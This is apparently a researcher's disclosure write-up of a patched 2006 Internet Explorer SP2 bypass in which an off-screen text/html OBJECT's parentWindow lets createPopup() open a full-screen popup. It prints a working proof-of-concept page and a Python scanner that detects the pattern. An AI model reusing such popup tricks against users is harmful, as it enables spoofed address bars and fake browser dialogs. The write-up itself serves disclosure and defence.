When SP2 shipped, Microsoft added size restrictions to createPopup() — the popup window could no longer extend beyond the browser’s own boundaries. It was a reasonable fix for a technique that was being used to fake browser chrome and cover the address bar. I called this one “No Big Deal” when I reported it, because on its own it does not enable much harm. But it is a clean bypass of the new restriction, and bypasses are worth documenting.
How It Works
The same <OBJECT TYPE="text/html"> trick from the main UXSS post also gives you a parentWindow reference that lives outside the browser’s normal frame hierarchy. When you call createPopup() from that window, the size restrictions that SP2 introduced do not apply — you can show a popup of any size, including one that covers the full screen.
The Code
<HTML>
<BODY>
<OBJECT ID="browserLimits"
STYLE="position:absolute;top:-1000px;left:-1000px;"
WIDTH=3000 HEIGHT=3000
DATA="favicon.ico"
TYPE="text/html">
</OBJECT>
<SCRIPT LANGUAGE="JavaScript">
function noBrowserLimits() {
// Get the window reference outside the browser's normal hierarchy.
var oLimit = document.all.browserLimits.object.parentWindow;
// createPopup from there — no size restrictions.
var blueScreen = oLimit.createPopup();
blueScreen.document.bgColor = "BLUE";
blueScreen.show(0, 0, 2000, 2000); // covers the full screen
}
window.onload = noBrowserLimits;
</SCRIPT>
</BODY>
</HTML>
The OBJECT is positioned off-screen so the user does not see it. Its parentWindow is where the magic happens — from that reference, createPopup() behaves as if SP2’s restrictions were never there.
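From the defender's side, the pattern above is easy to spot statically: a text/html OBJECT whose `.object.parentWindow` is dereferenced alongside a createPopup() call. The following scanner is an added example, not part of the original post; the two sample pages and the helper names are constructed here.

```python
import re
from html.parser import HTMLParser

# Constructed sample pages: a benign createPopup() user, and a page that reaches
# createPopup() through a text/html OBJECT's parentWindow (the SP2 bypass shape).
BENIGN = """<html><body><script>
var p = window.createPopup(); p.show(10, 10, 200, 100);
</script></body></html>"""

BYPASS = """<html><body>
<object id="lim" type="text/html" data="favicon.ico"
 style="position:absolute;top:-1000px;left:-1000px;"></object>
<script>
var w = document.all.lim.object.parentWindow;
var pop = w.createPopup(); pop.show(0, 0, 2000, 2000);
</script></body></html>"""


class ObjectScriptCollector(HTMLParser):
    """Collects ids of text/html OBJECT tags and the bodies of inline scripts."""

    def __init__(self):
        super().__init__()
        self.html_object_ids = []
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "object" and a.get("type", "").lower() == "text/html":
            self.html_object_ids.append(a.get("id", ""))
        if tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def find_popup_bypass(html):
    """Return ids of text/html OBJECTs whose parentWindow is used with createPopup()."""
    c = ObjectScriptCollector()
    c.feed(html)
    js = "\n".join(c.scripts)
    hits = []
    for oid in c.html_object_ids:
        oid_re = re.escape(oid)
        # document.all.<id>.object.parentWindow  or  getElementById("<id>").object.parentWindow
        ref = rf"(?:document\.all\.{oid_re}|getElementById\(['\"]{oid_re}['\"]\))\.object\.parentWindow"
        # Heuristic: the out-of-hierarchy window is taken AND createPopup() is called somewhere.
        if re.search(ref, js) and re.search(r"\.createPopup\s*\(", js):
            hits.append(oid)
    return hits
```

The check is deliberately a heuristic: a page that aliases the reference through an intermediate variable is still caught, but a script that builds the property chain dynamically is not.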
MSRC assigned this as case 6435. As I said at the time: it is not a catastrophic issue on its own, but combined with other techniques it could be used to convincingly spoof UI elements like the address bar or fake browser dialogs.
Reported to MSRC in 2006. This one was patched long ago; it is shared here as a historical record for learning purposes.